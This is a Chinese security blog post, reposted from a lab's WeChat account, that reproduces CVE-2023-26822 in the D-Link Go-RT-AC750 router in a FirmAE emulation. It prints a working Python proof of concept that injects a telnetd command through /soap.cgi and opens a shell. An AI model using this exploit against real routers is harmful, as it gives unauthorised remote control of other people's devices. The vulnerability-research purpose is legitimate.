D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

admin 2023年5月31日00:02:21评论58 views字数 1354阅读4分30秒阅读模式

漏洞概述
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现
D-Link Go-RT-AC750是一款双频无线路由器。
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现
D-Link Go-RT-AC750在固件版本为revA_v101b03中存在命令注入漏洞,漏洞编号:CVE-2023-26822。未经授权的攻击者可以请求 /soap.cgi 路由通过携带的参数进行命令拼接,从而控制路由器。

环境搭建
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

1.FirmAE 工具安装

首先拉取FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

运行下载脚本

cd FirmAE/./download.sh
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

运行./install.sh进行安装

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

2.下载固件

本文模拟的是设备型号为Go-RT-AC750,固件版本:revA_v101b03

下载地址:

https://eu.dlink.com/uk/en/products/go-rt-ac750-wireless-ac750-dual-band-easy-router

下载后得到GORTAC750_A1_FW_v101b03.bin固件文件

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

3.FirmAE工具初始化

在FirmAE工具目录下执行./init.sh进行初始化

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

4.安装binwalk

这里使用FirmAE工具目录下的binwalk安装程序进行安装

cd binwalk-2.3.3/

python3 setup.py install

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

5.模拟运行固件
执行如下命令对固件进行解压

binwalk -Me /root/GORTAC750_A1_FW_v101b03.bin --run-as=root
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

执行如下命令来模拟运行固件

sudo ./run.sh -r GORTAC750 /root/GORTAC750_A1_FW_v101b03.bin

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

使用浏览器访问http://192.168.0.1,出现如下界面则表明成功模拟了一台D-Link Go-RT-AC750路由器

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现


漏洞复现
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

POC内容如下:

from socket import *from os import *from time import *
request = b"POST /soap.cgi?service=&&telnetd -p 4123& HTTP/1.1rn"request += b"Host: localhost:49152rn"request += b"Content-Type: text/xmlrn"request += b"Content-Length: 88rn"request += b"SOAPAction: a#brnrn" s = socket(AF_INET, SOCK_STREAM)s.connect((gethostbyname("192.168.0.1"), 49152))s.send(request) sleep(10)system('telnet 192.168.0.1 4123')

执行POC,成功获取shell

python3 poc.py
D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

美创科技旗下第59号实验室,专注于数据安全技术领域研究,聚焦于安全防御理念、攻防技术、威胁情报等专业研究,进行知识产权转化并赋能于产品。累计向CNVD、CNNVD等平台提报数百个高质量原创漏洞,发明专利数十篇,团队著有《数据安全实践指南》


原文始发于微信公众号(第59号):D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月31日00:02:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)复现https://cn-sec.com/archives/1763003.html

发表评论

匿名网友 填写信息